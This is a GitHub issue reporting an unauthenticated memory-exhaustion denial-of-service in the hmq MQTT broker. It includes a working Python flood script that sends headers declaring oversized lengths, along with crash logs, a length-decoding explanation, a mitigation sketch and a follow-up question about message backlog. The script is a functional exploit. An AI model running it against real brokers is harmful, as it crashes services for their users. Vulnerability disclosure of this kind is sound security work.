fhmq/hmq

hmq's memory can be easily filled up, causing excessive memory use and a crash.

AAArdu opened this issue · 1 comment

Description

Hi, I found that hmq's memory can be easily filled up by a simple MQTT message that declares a large length field. Sending such a message to the server can make it consume excessive memory and crash (killed by the system). There appears to be an issue with memory allocation and control. This could be exploited by attackers to mount a DoS attack.

A similar vulnerability is CVE-2017-7651.

Note that even unauthenticated attackers can do this.
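The oversized allocation stems from trusting the declared Remaining Length in the MQTT fixed header. A minimal sketch (not hmq's actual code) of decoding that variable-length field shows why the attack bytes `\xff\xff\xff\x7f` decode to the protocol maximum:

```python
def decode_remaining_length(data: bytes) -> int:
    """Decode MQTT's variable-length Remaining Length field (1-4 bytes)."""
    value = 0
    multiplier = 1
    for byte in data[:4]:
        value += (byte & 0x7F) * multiplier
        if byte & 0x80 == 0:  # continuation bit clear: this was the last byte
            return value
        multiplier *= 128
    raise ValueError("malformed Remaining Length")

# The attack payload's length bytes decode to the protocol maximum:
print(decode_remaining_length(b"\xff\xff\xff\x7f"))  # 268435455 (256 MiB - 1)
```

A broker that pre-allocates a buffer of this declared size per connection, before any body bytes arrive, can be made to commit roughly 256 MiB per half-open connection.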

Environment

docker Ubuntu 20.04.3 LTS with 4GB RAM

hmq (github commit b2e79c3 on Jun 18)

go version go1.19

Attack simulation

Run the server:

hmq --port 1883

Run the attack script.

The attack script (in Python) may look like:

import socket
import threading
import time

ip_address = "0.0.0.0"  # target broker address
port = 1883

payload = b"\x80\xff\xff\xff\x7f"  # MQTT SUBSCRIBE-type message

###[ MQTT fixed header ]### 
#   type      = SUBSCRIBE
#   DUP       = Disabled
#   QOS       = At most once delivery
#   RETAIN    = Disabled
#   len       = 268435455

def send_attack():
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect((ip_address, port))

    soc.sendall(payload)
    soc.close()

while True:
    for i in range(15):
        # daemon=True replaces the deprecated setDaemon() call
        t = threading.Thread(target=send_attack, daemon=True)
        t.start()
    time.sleep(1)
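A common mitigation (a sketch under assumed limits, not hmq's code) is to reject a declared length above a configured cap before allocating, and to read the body incrementally instead of pre-allocating the full declared size:

```python
import socket

MAX_PACKET_SIZE = 1 << 20  # 1 MiB cap; an assumed broker-side limit

def read_packet_body(sock: socket.socket, remaining_length: int) -> bytes:
    """Read an MQTT packet body without trusting the declared length."""
    if remaining_length > MAX_PACKET_SIZE:
        raise ValueError(f"declared length {remaining_length} exceeds limit")
    chunks = []
    to_read = remaining_length
    while to_read:
        # Read in small chunks: memory grows only with bytes actually received.
        chunk = sock.recv(min(to_read, 4096))
        if not chunk:
            raise ConnectionError("peer closed before sending declared body")
        chunks.append(chunk)
        to_read -= len(chunk)
    return b"".join(chunks)
```

With this check, the attack payload's declared length of 268435455 is rejected immediately, and a peer that declares a modest length but never sends the body ties up only a small read buffer.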

Result

The server consumes excessive memory and is killed by the system.

...
{"level":"error","timestamp":"2022-12-27T13:30:01.462Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.466Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.469Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.472Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.475Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
Killed

A large number of messages are pushed to a topic, and if no consumer consumes them for a long time, the broker's memory usage keeps growing as messages pile up. How can this situation be handled?
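Brokers typically handle this by bounding per-subscriber queues and applying a drop policy when the bound is reached. A minimal sketch of a drop-oldest queue (the policy choice and limit are assumptions, not hmq behavior):

```python
from collections import deque

# A bounded per-subscriber queue: when full, the oldest message is evicted.
# (Drop-newest or disconnecting the slow consumer are common alternatives.)
queue = deque(maxlen=1000)

for i in range(1500):
    queue.append(i)

print(len(queue))  # 1000 — memory is bounded regardless of inflow
print(queue[0])    # 500  — the oldest 500 messages were dropped
```

The trade-off is losing messages for slow or absent consumers, but the broker's memory stays bounded no matter how fast publishers push.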